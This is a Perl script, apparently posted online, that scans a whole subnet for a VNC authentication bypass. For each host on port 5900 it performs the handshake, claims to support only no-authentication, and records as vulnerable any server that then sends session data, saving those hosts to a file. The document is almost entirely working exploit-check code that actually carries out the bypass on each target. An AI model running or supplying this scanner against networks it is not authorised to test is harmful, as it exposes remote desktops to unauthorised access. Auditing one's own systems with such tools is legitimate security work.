Upload script perl VNC Vuln scanner

1.  #!/usr/bin/perl
2. # Multi-threaded scan for OpenVNC 4.11 authentication bypass.
3.  
4. use strict; # why not?
5. use warnings;
6. use IO::Socket;
7. use threads;
8. use threads::shared;
9. use Errno qw(EAGAIN);
10.  
11. # Configuration variables
12. use constant VNC_PORT => 5900;
13. my $splits = 5; # Creates 2^N processes.
14. my $avg_time = 5; # Tweak this to get better time estimates.
15. our $subnet;
16.  
17. our @results : shared;
18. our $todo = 0;
19. my $orig_thread = "yes";
20. my $start;
21. my $end;
22. my $time_estimate;
23. my $elapsed = time;
24. my $out_file;
25.  
26. ++$|; # To watch as the results come in, in real time.
27. $subnet = $ARGV[0] || ""; # Get subnet from command line, else ask for it.
28.  
29. while (1) {
30. last if $subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/;
31. print "\nWhat subnet do you want to scan? ";
32. chomp($subnet = <STDIN>);
33. print "That does not look right. Enter something like 192.168.1.*\n\n";
34. }
35.  
36. # Put the subnet in the form x.y.z. so we can just concatenate the hostnum.
37. $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
38. $subnet .= ".";
39.  
40. $out_file = "VNC_" . $subnet . "txt";
41.  
42. # Mostly a guesstimate
43. $time_estimate = $avg_time * (256 / (2**$splits));
44. $time_estimate = int ($time_estimate / 60);
45. $time_estimate += 4;
46.  
47. print "\nScanning subnet ${subnet}x -- this should take approximately
48. $time_estimate minute(s).\n";
49. print "[!] = Vulnerable, [*] = Safe, [.] = No response.\n\n";
50.  
51. CHECK: {
52. unless ($splits >= 0 && $splits <= 8) {
53. die "ERROR: Do not split $splits times--that makes no sense.\n";
54. }
55.  
56. unless ($splits <= 5) {
57. warn "Reduce the number of splits from $splits to 5 or less if you
58. get memory errors.\n\n";
59. }
60. }
61.  
62. # Ugly, but this works.
63. DivideWork() if $splits >= 1;
64. DivideWork() if $splits >= 2;
65. DivideWork() if $splits >= 3;
66. DivideWork() if $splits >= 4;
67. DivideWork() if $splits >= 5;
68. DivideWork() if $splits >= 6;
69. DivideWork() if $splits >= 7;
70. DivideWork() if $splits >= 8;
71.  
72. # Which IPs this thread scans.
73. $start = $todo << (8 - $splits);
74. $end = $start + (256 / (2**$splits)) - 1;
75.  
76. foreach ($start .. $end) {
77. Scan_VNC($_);
78. }
79.  
80. wait until $?; # Wait for children to finish.
81. exit unless $orig_thread eq "yes";
82.  
83. # Only the original parent thread will continue.
84.  
85. $elapsed = time - $elapsed;
86. $elapsed /= 60;
87. $elapsed = int $elapsed;
88.  
89. print "\n\nFinished scanning ${subnet}x in $elapsed minute(s).\n";
90.  
91. SaveData();
92.  
93. exit;
94.  
95. ####################################
96.  
97. sub DivideWork {
98. my $pid;
99.  
100. FORK: {
101. $todo *= 2;
102. if ($pid = fork) {
103. # Parent
104. ++$todo;
105.  
106. } elsif (defined $pid) {
107. # Child
108. $orig_thread = "no";
109.  
110. } elsif ($! == EAGAIN) {
111. # Recoverable forking error.
112. sleep 7;
113. redo FORK;
114.  
115. } else {
116. # Unable to fork.
117. die "Unable to fork: $!\n";
118.  
119. }
120. }
121. }
122.  
123. sub SaveData {
124. my $vulns = 0;
125. open(FOUND, ">", $out_file) or die "Cannot open $out_file -- $!";
126.  
127. foreach my $IP (1..254) {
128. my $record;
129. $record = $results[$IP];
130.  
131. unless ($record =~ m/not vulnerable/io) {
132. ++$vulns;
133. print FOUND $record;
134. }
135. }
136.  
137. print FOUND "\nVulnerabilites found: $vulns";
138. close(FOUND) or die "Cannot close $out_file -- $!";
139.  
140. print "Data saved to ${out_file}\n\n";
141. }
142.  
143. sub Scan_VNC {
144. # Scan for OpenVNC 4.11 authentication bypass.
145.  
146. my $hostnum = shift;
147. my $host = $subnet . $hostnum;
148. my $sock;
149. my $proto_ver;
150. my $ignored;
151. my $auth_type;
152. my $sec_types;
153. my $vnc_data;
154.  
155. $host or die("ERROR: no host passed to Scan_VNC.\n");
156.  
157. # The host numbers .0 and .255 are reserved; ignore them.
158. if ($hostnum <= 0 or $hostnum >= 255) { return; }
159.  
160. # Format things nicely--that crazy formula just adds spaces.
161. $results[$hostnum] = "$host";
162. $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
163.  
164. unless ($sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => VNC_PORT, Proto => 'tcp',)) {
165. $results[$hostnum] .= "Not vulnerable, no response.\n";
166. print ".";
167. return;
168. }
169.  
170. # Negotiate protocol version.
171. $sock->read($proto_ver, 12);
172. print $sock $proto_ver;
173.  
174. # Get supported security types and ignore them.
175. $sock->read($sec_types, 1);
176. $sock->read($ignored, unpack('C', $sec_types));
177.  
178. # Claim that we only support no authentication.
179. print $sock "\x01";
180.  
181. # We should get "0000" back, indicating that they won't fall back to no authentication.
182. $sock->read($auth_type, 4);
183. if (unpack('I', $auth_type)) {
184. $results[$hostnum] .= "Not vulnerable, refused to support
185. authentication type.\n";
186. print "*";
187. close($sock);
188. return;
189. }
190.  
191. # Client initialize.
192. print $sock "\x01";
193.  
194. # If the server starts sending data, we're in.
195. $sock->read($vnc_data, 4);
196.  
197. if (unpack('I', $vnc_data)) {
198. $results[$hostnum] .= "VULNERABLE! $proto_ver\n";
199. print "!";
200. } else {
201. $results[$hostnum] .= "Not vulnerable, did not send data.\n";
202. print "*";
203. }
204.  
205. close($sock);
206. return;
207. }